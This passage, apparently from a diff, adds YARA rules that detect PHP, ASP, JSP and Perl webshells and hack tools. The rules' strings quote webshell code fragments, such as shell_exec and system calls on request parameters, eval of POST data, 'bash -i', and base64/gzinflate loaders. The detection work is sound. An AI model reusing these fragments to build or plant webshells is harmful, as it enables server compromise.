+      $s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+      $s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java." 
+      $s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
+      $s15 = "endPoint=random1.getFilePointer();" fullword
+      $s20 = "if (request.getParameter(\"command\") != null) {" fullword
+   condition: 
+      3 of them
+}
+
+rule WebShell_g00nshell_v1_3_RID2F6B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
+      $s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
+      $s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
+      $s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
+      $s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_php_include_w_shell_RID325E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file php-include-w-shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 14:02:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
+      $s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
+      $s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
+   condition: 
+      1 of them
+}
+
+rule WebShell_PhpSpy_Ver_2006_RID2F9D : DEMO T1007 T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1007, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
+      $s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname." 
+      $s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32" 
+      $s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'" 
+   condition: 
+      1 of them
+}
+
+rule WebShell_ZyklonShell_RID2F05 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file ZyklonShell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:39:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
+      $s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
+      $s2 = "<TITLE>404 Not Found</TITLE>" fullword
+      $s3 = "<H1>Not Found</H1>" fullword
+   condition: 
+      all of them
+}
+
+rule WebShell_php_webshells_myshell_RID3353 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file myshell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 14:43:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu" 
+      $s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o" 
+      $s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
+      $s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT" 
+   condition: 
+      1 of them
+}
+
+rule WebShell_simple_cmd_RID2EA3 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file simple_cmd.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:23:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+      $s2 = "<title>G-Security Webshell</title>" fullword
+      $s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+      $s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+   condition: 
+      1 of them
+}
+
+rule WebShell_aZRaiLPhp_v1_0_RID2F66 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:55:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED" 
+      $s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
+      $s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
+      $s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0__RID3B1A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 20:14:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+      hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</" 
+      $s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh" 
+      $s11 = " *   Coded by Pixcher" fullword
+      $s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_Generic_PHP_7_RID2F20 : DEMO GEN T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:43:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
+      hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
+      hash3 = "715f17e286416724e90113feab914c707a26d456"
+      tags = "DEMO, GEN, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
+      $s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
+      $s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
+      $s4 = "if( $action == \"dumpTable\" )" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall_RID3C61 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 21:09:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
+      hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
+      hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
+      $s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
+      $s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
+      $s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_Generic_PHP_9_RID2F22 : DEMO GEN SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2014-04-06 11:44:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-06"
+      hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
+      hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
+      tags = "DEMO, GEN, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = { 3a 3c 62 3e 22 20 2e 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 24 5f 50 4f 53 54 5b 27 74 6f 74 27 5d 29 2e 20 22 3c 2f 62 3e 22 3b } 
+      $ = { 69 66 20 28 69 73 73 65 74 28 24 5f 50 4f 53 54 5b 27 77 71 27 5d 29 20 26 26 20 24 5f 50 4f 53 54 5b 27 77 71 27 5d 3c 3e 22 22 29 20 7b } 
+      $ = { 70 61 73 73 74 68 72 75 28 24 5f 50 4f 53 54 5b 27 63 27 5d 29 3b } 
+      $ = { 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 72 61 64 69 6f 22 20 6e 61 6d 65 3d 22 74 61 63 22 20 76 61 6c 75 65 3d 22 31 22 3e 42 36 34 20 44 65 63 6f 64 65 3c 62 72 3e } 
+   condition: 
+      1 of them
+}
+
+rule WebShell_Generic_PHP_1_RID2F1A : DEMO GEN SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - from files Dive Shell 1.0"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:42:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-06"
+      hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
+      hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
+      hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
+      tags = "DEMO, GEN, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = { 76 61 72 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3d 20 6e 65 77 20 41 72 72 61 79 28 3c 3f 70 68 70 20 65 63 68 6f 20 24 6a 73 5f 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3f 3e 29 3b } 
+      $ = { 69 66 20 28 65 6d 70 74 79 28 24 5f 53 45 53 53 49 4f 4e 5b 27 63 77 64 27 5d 29 20 7c 7c 20 21 65 6d 70 74 79 28 24 5f 52 45 51 55 45 53 54 5b 27 72 65 73 65 74 27 5d 29 29 20 7b } 
+      $ = { 69 66 20 28 65 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 33 38 20 26 26 20 63 75 72 72 65 6e 74 5f 6c 69 6e 65 20 3c 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 2e 6c 65 6e 67 74 68 2d 31 29 20 7b } 
+   condition: 
+      1 of them
+}
+
+rule WebShell__findsock_php_findsock_shell_php_reverse_shell_RID3D7D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 21:56:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
+      hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
+   condition: 
+      all of them
+}
+
+rule WebShell_Generic_PHP_6_RID2F1F : DEMO GEN SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:43:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
+      hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+      hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+      tags = "DEMO, GEN, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
+      $s5 = "echo shell_exec($com);" fullword
+      $s7 = "if($sertype == \"winda\"){" fullword
+      $s8 = "function execute($com)" fullword
+      $s12 = "echo decode(execute($cmd));" fullword
+      $s15 = "echo system($com);" fullword
+   condition: 
+      4 of them
+}
+
+rule HKTL_Unpack_Injectt_RID2E35 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file Injectt.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "%s -Run                              -->To Install And Run The Service" 
+      $s3 = "%s -Uninstall                        -->To Uninstall The Service" 
+      $s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN" 
+   condition: 
+      all of them
+}
+
+rule Webshell_ASP_CmdAsp_2_RID2EB2 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file CmdAsp.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:25:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "' -- Read the output from our command and remove the temp file -- '" 
+      $s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" 
+      $s9 = "' -- create the COM objects that we will be using -- '" 
+   condition: 
+      all of them
+}
+
+rule MAL_vanquish_RID2BB9 : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file vanquish.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 09:18:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged" 
+      $s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU" 
+      $s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z" 
+   condition: 
+      all of them
+}
+
+rule HKTL_shelltools_g0t_root_uptime_RID336C : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file uptime.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 14:47:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "JDiamondCSlC~" 
+      $s1 = "CharactQA" 
+      $s2 = "$Info: This file is packed with the UPX executable packer $" 
+      $s5 = "HandlereateConso" 
+      $s7 = "ION\\System\\FloatingPo" 
+   condition: 
+      all of them
+}
+
+rule PHP_Cloaked_Webshell_SuperFetchExec_RID347D : ANOMALY DEMO T1036 T1100 WEBSHELL {
+   meta:
+      description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+      author = "Florian Roth"
+      reference = "http://goo.gl/xFvioC"
+      date = "2014-04-05 15:32:41"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "ANOMALY, DEMO, T1036, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);" 
+   condition: 
+      $s0
+}
+
+rule WebShell_RemExp_asp_php_RID3021 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-05 12:26:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
+      $s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f" 
+      $s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
+      $s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
+      $s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
+   condition: 
+      all of them
+}
+
+rule WebShell_dC3_Security_Crew_Shell_PRiV_RID351E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-05 15:59:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+      $s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
+      $s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
+      $s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
+      $s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
+      $s20 = "if (isset($_GET['rename_all'])) {" fullword
+   condition: 
+      3 of them
+}
+
+rule DarkSecurityTeam_Webshell_RID3107 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Dark Security Team Webshell"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-02 13:05:01"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
+   condition: 
+      1 of them
+}
+
+rule Webshell_perlbot_pl_RID2ED9 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file perlbot.pl.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:32:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")" 
+      $s1 = "#Acesso a Shel - 1 ON 0 OFF" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_php_backdoor_php_RID3139 : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file php-backdoor.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:13:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://michaeldaw.org   2006" 
+      $s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win" 
+      $s3 = "coded by z0mbie" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_small_php_php_RID300D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file small.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:23:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+      $s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1" 
+      $s4 = "@ini_set('error_log',NULL);" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_shellbot_pl_RID2F3E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file shellbot.pl.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:48:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "ShellBOT" 
+      $s1 = "PacktsGr0up" 
+      $s2 = "CoRpOrAtIoN" 
+      $s3 = "# Servidor de irc que vai ser usado " 
+      $s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_ngh_php_php_RID2F31 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file ngh.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Cr4sh_aka_RKL" 
+      $s1 = "NGH edition" 
+      $s2 = "/* connectback-backdoor on perl" 
+      $s3 = "<form action=<?=$script?>?act=bindshell method=POST>" 
+      $s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_jsp_reverse_jsp_2_RID318B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file jsp-reverse.jsp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:27:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "// backdoor.jsp" 
+      $s1 = "JSP Backdoor Reverse Shell" 
+      $s2 = "http://michaeldaw.org" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Tool_asp_RID2DE7 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Tool.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 10:51:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "mailto:rhfactor@antisocial.com" 
+      $s2 = "?raiz=root" 
+      $s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE" 
+      $s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_NT_Addy_asp_RID2ECC : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file NT Addy.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:29:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "NTDaddy v1.9 by obzerve of fux0r inc" 
+      $s2 = "<ERROR: THIS IS NOT A TEXT FILE>" 
+      $s4 = "RAW D.O.S. COMMAND INTERFACE" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_phvayvv_php_php_RID3108 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file phvayvv.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:05:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "{mkdir(\"$dizin/$duzenx2\",777)" 
+      $s1 = "$baglan=fopen($duzkaydet,'w');" 
+      $s2 = "PHVayv 1.0" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_rst_sql_php_php_RID30FC : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file rst_sql.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:03:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "C:\\tmp\\dump_" 
+      $s1 = "RST MySQL" 
+      $s2 = "http://rst.void.ru" 
+      $s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_c99madshell_v2_0_php_php_RID33A9 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file c99madshell_v2.0.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:57:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef" 
+   condition: 
+      all of them
+}
+
+rule Webshell_telnet_pl_RID2E6D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file telnet.pl.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:14:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "W A R N I N G: Private Server" 
+      $s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   " 
+   condition: 
+      all of them
+}
+
+rule Webshell_w3d_php_php_RID2F02 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file w3d.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:38:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "W3D Shell" 
+      $s1 = "By: Warpboy" 
+      $s2 = "No Query Executed" 
+   condition: 
+      2 of them
